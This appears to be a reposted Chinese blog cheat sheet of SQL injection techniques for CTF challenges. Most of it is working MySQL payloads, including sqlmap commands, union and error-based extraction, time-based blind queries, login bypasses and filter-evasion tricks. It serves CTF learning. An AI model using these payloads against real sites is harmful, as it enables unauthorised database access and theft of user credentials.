CTF 中的 SQL 注入总结

最新推荐文章于 2024-09-11 20:11:09 发布
最新推荐文章于 2024-09-11 20:11:09 发布
阅读量4.9k 收藏 18
点赞数 2
分类专栏: CTF 漏洞分析心得 文章标签: CTF SQL注入 漏洞
原文链接:https://www.restran.net/2018/10/29/ctf-sqli-notes/
版权

flag 常见表

1

select flag from flag

SQL 注入的基本原理

1
2
3

select * from user where username='' and pass=''
# 构造 username=devnull' or '1后,sql 语句变成
select * from user where username='devnull' or '1' and pass=''

SQLMap

1

python sqlmap.py -u "http://192.168.1.2/get_info.php?title=xxx&order=id" --current-db --batch --flush --tables

自定义的注入位置,用 * 号表示,如 header 的x-forwarded-for 注入

1

python sqlmap.py -u "http://192.168.118.142/" --headers="X-Forwarded-For: *" --banner

MySQL中的注释符

  • # 注释从#字符到行尾
  • -- 注释从–序列到行尾,后面需要跟上一个或多个空格,tab也可以
  • /* */ 注释中间的字符

获取元数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

# 获取当前的数据库用户,数据库名称,数据库的版本信息
select user(),database(),version() from dual;
# 查询数据库,有时需要限制返回的数量,或者偏移,例如页面只显示一条数据的情况 limit 0,1 limit 1,2
# 需要通过偏移来返回所有的数据库
select schema_name from information_schema.schemata;
# group_concat 函数是将多行数据连接成一行
select group_concat(schema_name) from information_schema.schemata;
# 查询表
# 方法1
select group_concat(table_name) from information_schema.tables where table_schema=database();  
# 方法2
select table_name from information_schema.tables where table_schema='database_name';
# 方法3
select table_name from information_schema.tables where table_schema=(select database());

# 查询列
select column_name from information_schema.columns where table_schema='database_name' and table_name='users';
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag';

# 上面可能会被waf识别,也可以这样
select group_concat(column_name) from information_schema.columns where table_name='users';

# 字符串可以转换成16进制
select concat(group_concat(distinct+column_name)) from information_schema.columns where table_name=0x696e666f;

报错注入的一些技巧

用不存在的函数,爆出数据库名

如果过滤了 information_schema,也就无从获取表名和字段信息了,但是如果开启了报错,根据 MySQL 的特性,用一个不存在的自定义函数,就可以爆出数据库名。

1
2
3

SELECT * from users t where t.username=a()
// 报错信息,数据库名是 test_db
[Err] 1305 - FUNCTION test_db.a does not exist

利用 linestring 函数,爆出当前表名

1
2
3

SELECT * from users where id=1 and linestring(id)
// 报错信息,当前表名是 users
[Err] 1367 - Illegal non geometric '`test_db`.`users`.`id`' value found during parsing

使用 using+join 获取字段名

1
2
3
4
5
6
7

SELECT * from users where id=1 union select * from (select * from users as A join users as B using(id)) as C
// 报错信息,爆出列名 username
[Err] 1060 - Duplicate column name 'username'
using中增加新的列名,可以继续爆出其它列名,直到没有报错信息
SELECT * from users where id=1 union select * from (select * from users as A join users as B using(id,username)) as C
// 报错信息,又爆出一个列名
[Err] 1060 - Duplicate column name 'password'

判断字段的数量

1
2
3
4

# 原始的
http://192.168.137.140/cms/show.php?id=35
# 后面加上 order by 数字,就会按照第几个字段进行排序,如果没有会报错
http://192.168.137.140/cms/show.php?id=35 order by 16

union查询

1
2
3
4
5
6

# mysql执行:语句正常;
# mssql执行:语句错误,数据类型不匹配,无法正常执行
select id,username from users union select 1,2;     

# oracle执行:语句错误,数据类型不匹配
select id,username from users union select 1,2 from dual;

遇到 union 错误

1
2
3
4
5
6

# 遇到 Illegal mix of collations for operation 'UNION'
http://192.168.137.140/cms/show.php?id=999 union select 1,2,group_concat(schema_name) from information_schema.schemata
# 是编码有问题,可以替换成
http://192.168.137.140/cms/show.php?id=999 union select 1,2,hex(group_concat(schema_name)) from information_schema.schemata

# 返回的结果是16进制,转换一下就可以了

绕过过滤

1

$check= eregi('select|insert|update|delete|from|or|and|=|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $pass);
  • and 用 && 代替
  • or 用 || 代替
  • union select from 变成 /*!union*/ 这种

空格绕过

1
2
3
4
5

// 使用括号,select, from , where 这些关键字不能用括号
select(table_name)from(information_schema.tables)where(table_schema)=database()
// 使用内联注释
select/*1*/username/*1*/from/*1*/users
// 使用%0a 绕过

关键字写两次

用 seselectlect 可以绕过

1

preg_replace('/select|union|from|where|insert|update/i','',$username)

大小写绕过

用 SELECT 可以绕过

1

preg_replace('/select|union|from|where|insert|update/','',$username)

16进制绕过

mysql中字符串都可以转换成对应的16进制形式。

例如:

1 or 1 == 0x31206f722031

利用前提:

1、insert插入时对应字段为字符类型(varchar、char等等)
2、SQL语句values时不允许存在单引号。

例句:

1

insert into xiaol(id, address) values(1, 0x31206f722031)

碰到 “=” 等于号被过滤的情况。

我们知道 = 号,在mysql中常用条件查询(过滤的了话)。可以使用其他条件来进行判断

可以使用 <> 不等于,也可以改用 like

1
2
3

1' || username like 0x61646d696e)#
# 16进制转换后为,发现admin前后不能加',否则会找不到数据
1' || username like admin)#

这里就直接使用了like,(这里说一下小技巧,有时候想 like 模糊查询下,但是有单引号,那么我可以这样写: like 0x2725302d662e6f72672527 (’%0-f.org%’))

regexp 后面的参数也可以使用16进制

regexp 和 like

当 select 和 () 被过滤的时候,可以用 regexp 和 like 盲注出当前表的字段值

like 使用 % 和 _ 作为通配符,因此这两个字符无法匹配,需要结合 regexp 搭配使用

  • % 表示任意个或多个字符。可匹配任意类型和长度的字符。
  • _ 表示任意单个字符。匹配单个任意字符,它常用来限制表达式的字符长度语句(可以代表一个中文字符)

regexp 在使用的时候要加上 ‘^’ 这个前缀,例如 ‘^abc’

regexp 和 like 在查询的时候默认都是不区分大小写的

1
2
3
4
5
6
7

# 不区分大小写
select * from table_name where a like 'a%'
select * from table_name where a regexp '^a'

# 区分大小写
select * from table_name where binary a like 'a%'
select * from table_name where binary a regexp '^a'

碰到 “,” 逗号被过滤的情况.

  • SUBSTR(password FROM 3 FOR 1) 等同于SUBSTR(PASSWORD,3,1)
  • SUBSTR(password FROM 2) 等同于 SUBSTR(PASSWORD,2)
  • substr(database()from(3)for(1)) 等同于 mid(database()from(3)for(1))
  • limit 1,1 中的逗号用limit 1 offset 1

使用 join

1

SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d;

括号被过滤的情况

在盲注中,如果过滤了括号(),那么将无法使用substr等函数,于是无法正常的逐字节读取字段内容,此时可以使用

1
2
3

SELECT * FROM users WHERE name NOT REGEXP '^h'
SELECT * FROM users WHERE name NOT REGEXP '^hh'
SELECT * FROM users WHERE name NOT REGEXP '^hhh'

根据盲注的结果,判断字段是否和某个正则表达式匹配,这样逐字节判断字段的值。

regexp相当于rlike,使用REGEXP,NOT REGEXP,RLIKE,NOT RLIKE绕过对括号的过滤

过滤空格

  • 控制字符替代法 %20 %09 %0A %0B %0C %0D %A0
  • 符号替代法 /**/、select..password、select+user()
  • 括号组合法 union(select(1),2)、select{x(password)}from{x(user)}

连续运算绕过

使用连续等号

1

SELECT * from users where username='-1'='' and password='-1'=''

 

从左到右运算,先计算username=’-1’,一般数据库里不会有’-1’,故该值为0。再计算0=’’,得到值为1。password=’-1’=’’同理。

也可以使用异或的方式,原理与连续等号相同

1

SELECT * from users where username=admin'^(substring((select(user()))from(1))='a')^'1'

union select from

只要按照union select from 的顺序出现,就被过滤

1

/union([\s\S]+)select([\s\S]+)from/i

绕过方法

1

id=1=2|@c:=(select(1))union(select@c)

读目录的exp为

1

id=1=2|@c:=(select(flag)from(flag)where(flag<0x30))union(select@c)

延时注入

1

/test/query.php?name=sadf' AND 7352=IF((ORD(MID((SELECT IFNULL(CAST(KeyIsMe AS CHAR),0x20) FROM example.__key__ ORDER BY ID LIMIT 0,1),18,1))>50),BENCHMARK(1000000,MD5(0x4b654d45)),7352)

1

/test/query.php?name=sadf' AND 7352=IF((ORD(MID((SELECT IFNULL(CAST(KeyIsMe AS CHAR),0x20) FROM example.__key__ ORDER BY ID LIMIT 0,1),18,1))>50),SLEEP(5),7352)

limit 注入

MySQL 5.x 到 5.6.6

1

SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

如果不支持报错注入的话,还可以基于时间注入:

1

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

直接使用sleep不行,需要用BENCHMARK代替。

updatexml 报错注入

如果测试的时候有提示出错信息,可以考虑使用报错注入

1

show coulumns 出错:Table 'inject_3333.article_test'' doesn't exist

使用的语句

1

http://www.xxx.com/a.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

0x7e 是 ~。因为 UPDATEXML 第二个参数需要 Xpath 格式的字符串,如果不符合要求,会报错,错误大概会是:

1

ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

这里 updatexml 里面第2个参数,不能使用 group_concat,因为 group_concat 是针对 select group_concat(column_name) 的

一些例子

1
2

# 遇到 show columns 后面要用 where 连接,不能用 and 
show COLUMNS FROM test_db.users where updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

show columns 注入

代码大概如下

1

mysql_query("show columns from `shop_{$table}`") or die("show coulumns 出错:".mysql_error());

show columns 语法

1
2

SHOW [FULL] COLUMNS {FROM | IN} tbl_name [{FROM | IN} db_name]
    [LIKE 'pattern' | WHERE expr]

利用报错注入

1

table=123` where updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#

group by with rollup

group by with rollup (对分组后的结果进行汇总),with rollup 会对 group by 的列,在最后多出一个 NULL 的值

1
2
3
4
5
6
7
8
9
10
11
12

$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇!";
    }
}else{
    print "一颗赛艇!";
}

payload

1
2

# limit 1 offset 2 是需要不断测试,猜测出表中一共有几条数据,最后一条 pwd 的值为 null
uname='or 1 group by pwd with rollup limit 1 offset 2#

desc

desc 是数据库的操作命令,可以列出表或者字段的定义,desc 后可以跟 表名 [列名],表名必须正确,而列名则不必须

1
2

desc tablename filedname
desc `tablename` `filedname`

例如这种情况下,可以在列名处构造 payload 实现绕过

1
2
3
4
5
6

// payload: test` `where 0 union select *  from secret_test
$table = $_GET['table']?$_GET['table']:"test";
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];

第1条SQL语句

1

desc `secret_test` `where 0 union select *  from secret_test`

第2条SQL语句

1
2

// 这里 ` ` 是 secret_test 表的别名
select 'flag{xxx}' from secret_test` `where 0 union select *  from secret_test

order by 注入

order by 后面可以加字段名,表达式和字段的位置,字段的位置需要是整数型。由于 order by 后面不可以跟union,一般利用盲注。order by 后面可以跟列名,如果不存在会报错,可以用来猜测列名。

sleep 盲注

1
2
3
4

order by name, if(1=1,name,price)
order by name, if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) // 正常响应时间
order by name, if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) // sleep 2秒
select id,name,price from book order by if(1=1,sleep(0),sleep(1));

利用报错

在有些情况下无法知道列名,而且也不太直观的去判断两次请求的差别,如下用IF语句为例。

1
2
3
4
5

order by IF(1=1,1,(select 1 union select 2)) 正常
order by IF(1=2,1,(select 1 union select 2)) 错误
order by IF(1=1,1,(select 1 from information_schema.tables)) 正常
# 会报错误 Subquery returns more than 1 row
order by IF(1=2,1,(select 1 from information_schema.tables)) 错误

where 比较条件弱类型

字符串与0进行比较的时候会转成数字,跟PHP的弱类型相同

1
2
3
4
5
6
7
8
9
10
11
12

# 如果是数字开头的,则会变成前面的字符串 
'123abc' == 123
'abc' == 0
# 可以把username不以数字开头的数据取出来
select * from users WHERE username=0;

#  'abc' + 0 为 0
select 'abc' + 0;
#  'abc' + 123 为 123
select 'abc' + 123;
# 'abc' + '0' 为 0,做加法运算的时候,两边都变成数字 
select 'abc' + '0';

可以获取所有用户名和密码不为0的数据,利用这种方式可以构造万能密码

1
2

select * from users where username=0 and password=0
select * from users where username='abcd' + '0' and password='abc' + '0'

不知道列名时的注入

方法1

在无法通过 information_schema 查询列名时,如果存在 SQL 错误回显,可以使用如下方法查询出列名。

1
2
3
4

select * from users where username='admin' and (select * from (select * from users as a join users as b using(username)) as c)

// 会显示这些错误信息
[Err] 1060 - Duplicate column name 'password'

当做 join 操作时,如果两个表都有相同的字段,可以使用 using,这样可以少写 SQL 语句,因为使用了 using,两个相同的表做 join 时,using 里面的字段只会保留一个,但是另外在using里面的,就会出现两个,导致出现 Duplicate column。
如果是使用 join on,则是会把所有的列都保留,也就是这里会有两个相同的 id,name, password,因为报错只显示第一个错误,会提示 Duplicate column name ‘id’。

方法2

是用两个 select union 的方式,目标的表用 select * 查询出所有的列,然后另外一个表使用 select 1,2 as c,利用别名的方式,为该序号的列定义了一个列名,由于有 union,两个表在该序号的列就可以使用新的列名,然后外层 select 使用新的列名查询出来。

1
2
3

select c from (select 1,2 as c union(select * from users)) as b
// 别名的另外一种方法,不使用 as
select c from (select 1,2`c` union(select * from users))`b`

一些函数

exists

判断是否存在

1

exists(select * from admin)

ASP 的网站

遇到 asp 的网站,发现有在url中获取id参数,那么也可能会从Cookie中获取,可以尝试 Cookie 注入

1

sqlmap -u "http://10.10.1.202/shownews.asp?id=83" --level=2 --risk=3 --cookie="id=82" --current-db --tables --batch

SQLite

输入 ‘’’ 看到如下数据,可以判断是 sqlite 数据库

1

unrecognized token: "202cb962ac59075b964b07152d234b70"
3riC5r
关注
专栏目录
mysql注入ctf_CTFSQL注入详解
weixin_29117805的博客
01-20 991
前言:最近打算玩一下CTF,玩过CTF的都知道SQL注入CTF最重要的题型。但是。。。。。。。。。很多大佬的WP都是一阵操作猛如虎。很多都不带解释的(大佬觉得简单所以就不解释了=_= =_= =_=)。所以这几天一直都在看关于SQL注入的文章,一直也不理解SQL注入的原理。今天刚好看到了一篇文章,自己也跟着那个博主的思路总结一下,对SQL注入有了一个大概的的理解。写这篇博文一是希望加深自己对S...
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 491
关于SQL注入的相关CTF笔记
CTFshow-WEB入门-SQL注入(下)
feng的博客
02-11 2113
web227 按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。 看了一下y4师傅的WP,原来这题考的是存储过程: 存储过程(Stored Procedure)是一种在数据库存储复杂程序,以便外部程序调用的一种数据库对象。 存储过程是为了完成特定功能的SQL语句集,经编译创建并保存在数据库,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。 存储过程思想上很简单,就是数据库 SQL 语言层面
一次线上ctf的日志分析(sql注入),网络协议分析,内存取证
weixin_50464560的博客
09-16 4465
拿到的是两个东西 我们先看secret.log 很多乱码但是有一串16进制数 把这段复制下来,我们放到HxD看 点击新建,直接粘贴 发现不对,观察头部,发现少了一个数(5) 因为加上5就是一个rar头部 即 导出来,改成ya.rar 要密码 我们看password.pcapng 输入过滤找post 有些很奇怪的东西 查询后知道这是jsfuck加密,具体看这里:https://blog.csdn.net/weixin_50464560/article/details/1203..
SQL注入+CTF实例
最新发布
hyq99999的博客
09-11 795
sql注入关联的相关知识+CTF实例
CTFer成长之路之CTFSQL注入
谢天谢地、不忘祖先、敬偎圣贤
02-20 1622
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF-电子数据取证-日志分析(第2题)
asd158923328的博客
08-25 3195
根据题意 进入环境,下载文件,用记事本打开,搜索password 13/Sep/2018:16:37:54 +0800验证得到key
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6311
关于SQL注入的思维导图可以点开看一下大图
CTFSQL注入常见题型整理.pdf
02-11
1. **了解异或操作**:熟悉异或操作的特性和如何在SQL注入利用它。 2. **多种绕过技巧**:尝试结合使用多种技术来实现注入。 3. **测试与验证**:通过手动测试和验证来确认注入是否成功。 --- ### SQL盲注 **...
ctfsql注入下的一些小技巧.doc
10-07
"ctfsql注入下的一些小技巧" CTF SQL 注入技巧是指在 Capture The Flag 比赛使用的 SQL 注入技术,以获取 Flags 或者其他敏感信息。以下是 CTF SQL 注入的一些小技巧: 一、注释符 在 MySQL ,有两...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 868
CTFHUB SQL
CTF-Web SQL注入
weixin_52182264的博客
04-26 4431
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
ctf简单的SQL注入(1)
wuerror的博客
07-14 2379
ctf注入套路(一):从系统内置的库来找到flag所在的表。例子:点击打开链接(实验吧简单的SQL注入之2,1也是同样的套路)先输入1,再输入1',页面报语法错误,再输入1 '页面出现SQLi detected!,推出空格被它过滤。用/**/来代替空格。输入 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.sch...
ctf web练习之SQL注入
weixin_51614848的博客
04-19 664
1.首先看题目像SQL注入,于是用burpsuit抓包。针对数据库web2(与题目名字一致)再爆表名,使用指令。备注:本文仅供自用,如有错误,欢迎指出。得到列名,再对列进行爆破,使用指令。把以上所有内容复制到1.txt。2.使用sqlmap,使用指令。
CTF从零到一 SQL注入攻击
山兔的博客
09-12 481
1.SQL注入攻击是开发者在开发程序时,对客户输入的参数过滤不严格,导致用户能更改数据库。 一.数字型注入: 1.访问链接http://192.168.20.133/sqll.php?id=2的页面和http://192.168.20.133/sqll.php?id=3-1的页面一样,可以说明这个注入点是数字型注入。表现为源码输入点“$_GET['id']”附近没有引号包裹。 2.链接模板:http://192.168.20.133/sqll.php?id=1 union select user,pwd f
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 5614
以pikachu靶场练习来学习ctf知识
CTF Web SQL注入专项整理(持续更新
m0_73734159的博客
10-19 3851
SQL注入专项整理
sql注入CTF常见考点方法总结
m0_52450604的博客
02-01 1050
SQL注入CTF常见考点总结
CTF入门之SQL注入
PolarPeak的博客
12-08 2283
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
ctfsql注入题目解法
05-05
CTFSQL注入是一种常见的攻击类型,通常是通过构造恶意输入来绕过应用程序的安全控制,从而访问或篡改应用程序的数据。 以下是一些SQL注入题目的解法: 1. 基于错误的注入:这种类型的注入通常涉及到将错误的输入发送到应用程序,然后观察应用程序返回的错误消息。通过分析错误消息,攻击者可以获得关于数据库的有用信息。例如,攻击者可以尝试通过发送 '和1=2' 的输入来触发一个错误消息。如果返回了一个错误消息,那么攻击者就会知道这个输入是有效的。 2. 基于时间的注入:这种类型的注入利用了数据库查询的延迟响应时间。攻击者可以在输入添加一些额外的SQL语句,这些语句会导致查询的执行时间变长。通过观察查询的响应时间,攻击者可以获得关于数据库的有用信息。 3. 盲注入:这种类型的注入通常是在攻击者无法看到应用程序返回的响应消息时使用的。攻击者可以尝试发送不同类型的输入来推断数据库的数据。例如,攻击者可以尝试使用布尔逻辑来确定某个字段是否存在数据。 4. 堆叠注入:这种类型的注入涉及到在单个输入添加多个SQL语句。攻击者可以利用这些语句来执行多个操作,例如创建新用户、修改密码等。 5. 直接注入:这种类型的注入涉及到直接在SQL查询插入恶意代码。攻击者可以利用这些代码来执行任意操作,例如删除数据库的数据、修改数据库的数据等。 以上是一些常见的SQL注入题目解法,但是在实际的CTF比赛,攻击者需要具备较强的技术水平和经验才能成功地解决这些问题。因此,对于CTF选手而言,不断学习和实践是非常重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值